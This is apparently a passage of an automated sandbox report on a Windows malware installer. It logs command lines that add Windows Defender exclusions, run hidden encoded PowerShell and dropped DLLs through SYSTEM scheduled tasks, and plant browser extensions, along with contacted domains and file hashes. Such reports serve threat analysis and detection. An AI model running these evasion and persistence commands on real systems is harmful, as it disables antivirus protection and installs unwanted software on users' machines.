\"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\JHEwijpMlSQrgvQB\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VDiAXGzPiWUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epUZFeichsCPC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fZHZowTYSgfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qBvbbKpBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\nxeoDZreGracWIVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\JHEwijpMlSQrgvQB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gOnSLtuaM" /SC once /ST 01:04:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gOnSLtuaM"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gOnSLtuaM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MWViHNuTpmRlpInKg" /SC once /ST 02:36:09 /RU "SYSTEM" /TR "\"C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe\" Ci /JIsite_idTRr 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "MWViHNuTpmRlpInKg"

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe

C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\dwDhHVv.exe Ci /JIsite_idTRr 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bpJjqbWMDOjxkYrvBb"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\qBvbbKpBU\CoPIfj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "wbeMFPOaxEodGIM" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wbeMFPOaxEodGIM2" /F /xml "C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "wbeMFPOaxEodGIM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ahmsGQGyepwQnm" /F /xml "C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "NOwjEMTwOUYCj2" /F /xml "C:\ProgramData\nxeoDZreGracWIVB\WFVdaTI.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZeWhkVIxDswmIVkZF2" /F /xml "C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "rhpwGKPBtZLjUbFdohf2" /F /xml "C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BinjFlxHFUMMGNOij" /SC once /ST 04:04:29 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll\",#1 /gEsite_idacO 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BinjFlxHFUMMGNOij"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll",#1 /gEsite_idacO 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll",#1 /gEsite_idacO 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "MWViHNuTpmRlpInKg"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BinjFlxHFUMMGNOij"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 178.223.142.52.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 150.1.37.23.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 96.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 40.13.222.173.in-addr.arpa udp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
DE 142.250.186.65:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 138.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 99.18.217.172.in-addr.arpa udp
US 8.8.8.8:53 46.206.58.216.in-addr.arpa udp
DE 216.58.206.46:443 clients2.google.com tcp
US 8.8.8.8:53 65.186.250.142.in-addr.arpa udp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.240.147.44:80 api5.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4BED.tmp\Install.exe

MD5 179fb197a3d7311375c9037091fc224c
SHA1 802c18d747c379acd9c9a1fcae6e29636b7bd224
SHA256 ff3ef3388be54902b91b3833f2abea5b31fe50f4b5f1cc8be06d6aca1b6683b9
SHA512 c2d30d078c1358fcbfa5079893ab21c745df2532deee61b84e3eec395efeded6769a73c3d961fbb7f71260a6303e0f9cf22f37111fb90e7b8d4e4fdbd0337317

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i20qhyxx.xbw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0842dfd50ee9f64f1cc835bab876f3fe
SHA1 a934ff56eded078f1d460c8723013a633ebfda5e
SHA256 819738a2f59f43c1c3404cf3fdcf4c091963ea2617a9dd0183025d995eb2c223
SHA512 f709e75a2afe326db44b24059ebc83760c0b2a364926b2b0d9887ab71cb704ed5b97950532b2ca3dfc9fa795311ca10f8d68f924800132858dba0b0010a8e7c8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dc1612473e2bebe334fd86c7b3d16eb
SHA1 093f0f1c10084b5102d1aacb25e826d9d3849c7d
SHA256 16d78844a17c047eb94edf86dc51b43526bb955583bac69efb3d22b3b045b3df
SHA512 0f00cb0446c0157cd7f4e9981c901c428aab820058acbe8e50545be4aaa3710b7468f95ad8adc5932fb3e6833bc2619b6f23771e74e792b2802d75d08ba90602

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b9b0314d5794fc25d8f6e9a3c0f0caf6
SHA1 becb1ad6a1e77a932ead97985400948f2107eef9
SHA256 b12b1cff7a5ab505cb429783d59de7722b3dcc650a2e96334c8a4715d01c964d
SHA512 86075e3e683f77e4fe7ddf531a94327afc186895d08ac629dcd3d66f6fbb1afd0d0e269a4dc666f98a2186330ae84faf9acf251591d47f6f1db076e610ee5e23

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 5afb20b6db2d3a25749ad858deb9e62d
SHA1 86b3cf6d4f1e6768cde236b470cd24517666dd43
SHA256 670812d39ed1a31165d85fd16d7e1554c37d80074d59252b4dd23cd7e0ff1bc7
SHA512 4f656edc59dec0719daacc259e74768c32c4d2f99145da33c149b4102b86b9d970cc7b4bbae7c3f94d49480c5e814a6eed0d4af158342ac3cbed03de329640a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 8c42e38daa3967c0dbd1a7c997277337
SHA1 6ca32c442c87b1fdb51695f309ab85e0a8b7ac4b
SHA256 c83e699501fa76008a08daef520d2f8ee69ee9b1934b67c088637ee175ad6546
SHA512 237957f1cb063b22eeb6aa84eaa81dab617d28c35e7ea7ca40c45334d7982edec78c4a87fa16f0a2921f7cbf0267fdcc29a249df97b925f62c1df36fb691f899

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\qBvbbKpBU\tdfVGAH.xml

MD5 75dcfea47225562a856f85a72b459d99
SHA1 f505682d1fb881615a285458d96b64436a14a4d2
SHA256 d39d60d305fe9169a8434ee0a8ecc5f7cf8be1394020d27af26aefe3792d8e37
SHA512 e361bb3cd4eebd2dfee89cc643fa3ffaf57b049199eb6c5fc41bbd6f763fb23da110f2d1b827309d25114b574334718e5388a0de5f8702c683c541aa172747bb

C:\Program Files (x86)\fZHZowTYSgfU2\aJtOsWq.xml

MD5 f1a2e37bc9905658fc013ce649d0ef53
SHA1 3e2f7d0f29557789dcc39f752cc46f8cd83ac0da
SHA256 82516740dc038da91b6d20931346cf2e330fe1323fcc0f71d0f46f44978f2a70
SHA512 dbeadaa70e83060a87e9b0eadd79a7fa5df67c2b1fde840765a5bc77308b311a9f9f347396dad7acb3620a5aa395ad7eff8cd2fd3ead5745b6c62d030c6fabba

C:\ProgramData\nxeoDZreGracWIVB\WFVdaTI.xml

MD5 f3bdb727e58226a8ed56b936e800817e
SHA1 146c795e27dc59be68271f06e489e9fc70daf93e
SHA256 5f5bf0b34c0bf23d287dd95aff5651e1df7a5187d1f545daa1c57c5bcd4e356b
SHA512 6c38dfc6d7b0bfa1e14698d41b3fa7e26e00a4265fcaba0701b9b73376877f3d3df00fd9da6dd5a6d646f500f990068b9783b7bcc507de27fb5a3b3793522cc5

C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\DXIODRJ.xml

MD5 b5faed27d8f4b66cba8b7424ded6c38b
SHA1 86fcc23a43acd06a5b146dfaa240cbda0bcb8513
SHA256 3b4d39c4c51bba7a5921c157b9d7b8aba61d35b233f019d9a77bd69ac15ea5f1
SHA512 4f3a75d7cd97ce857e6e5be907595ce468b4d1a0fe0e19a8947c15ecaf5283995da13427b274c6f6fbfc25ca943e019cdb52aa2a0734208e9a31e0aaba465fb7

C:\Program Files (x86)\epUZFeichsCPC\jafxhIg.xml

MD5 dc9628fa8c89bb74b87823a3d54fc3f7
SHA1 a1fd5eddb0abca012155d2bddd20b0fcc6769421
SHA256 b07236dd4f9e9bb8b290da3d4e94035424b8d659330922b6a717b3b7f721d0ea
SHA512 25867526fb973cd8b23d739956bac809c99ad743f783b51a78898388fffd40da79755fc348822c7065f7f3646f861f844451f0af3aaee7e7da56042dcd190b30

C:\Windows\Temp\JHEwijpMlSQrgvQB\ZCDJPBcy\qOGTqyv.dll

MD5 44f3948cb32c3b8df1fca5ef30116aa0
SHA1 c674b72e1e1058d0e29d555abc09d40f0c7c8a0c
SHA256 12cd48a7e59081b04ad77863bdfc946ecaeccede9368f6410e05c80ee526a0fe
SHA512 09d5de6251c88e853132bc8455f2da4d4922a9059778c5103652da3420cd7f98de983f6e3e9ebbe201bd520ac6dbff4cc95b7f01cf6ea335b05671f99649b5b0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs.js

MD5 4e7831d2b9b650b8b84782e91e021fe1
SHA1 a384846d2bbabe9f29540fd0bfe5b1b05cdf213b
SHA256 91b821a6fcd77f784f6a67e0d6338fb7e56fbe7bf8f9ca4c61474fad2ab28c23
SHA512 9c6e84d3873e5c9e6d7f25be6afe997b59ffb3ec39844bfd687cbabebec224ef96f80a62c4a8eb92d2e03e9c0373fc6bb63ad3b54ed6318b8e2b699430ed6ac5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 001a39e0c21b36d6e41f4880c1cb3f4e
SHA1 acf3ecdda6b252e444c936cddc759ebb03dddbb0
SHA256 18120d3d844ee80ea5d7272f3700cfc0e52671b09fe9c059dcd3506bdeddfd90
SHA512 899cc5b718f3e755b5d1d5a28c2e5c934b905260f2296f4c82b086efc92a9582fb3b7961ec0761965661dfd05cfb1d893cb1fafc0ed362ef81d45e1cb90c6e80

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5a22016190d31ef84b7838347508d724
SHA1 eb1cb8f1ea94e866e9f3670f15f01a8c0ec504f3
SHA256 29ceab1c9e6173b8c01d4be4c9d07b50e91c6ce8fcc44739bf0999dd8e591009
SHA512 a5714c1b8d5ee6898d1709aa73c602b1bd323cb293ed8c3ca8462af2d8cb3f89afd81cab567048e359f894372ce5591f4fa588cbfa65c378716171ab8b62231c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 6568eaddc24877e8adccaceef783774f
SHA1 13055ae3ee7d7c5c6555462c5b8c1ddfc262effb
SHA256 2c801e61a0ef72828b905684ecf202589071c93ded9e88b7da81f3c496d7eb0b
SHA512 91e94ae021496cecc4e156e837e244530017630ddc9d0b4a374b24ef53e262b15ece51008ed59732b1103696ac5c466ac741c26ffb0863b638a463a12a30ba6c

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-06 05:01

Reported

2024-04-06 05:03

Platform

win11-20240214-en

Max time kernel

142s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\106d883758255a2ad087a5134b44276918cbe55d1082864a561c76644891d035.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS6A62.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\OjCHFYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\daaPwtm.exe N/A
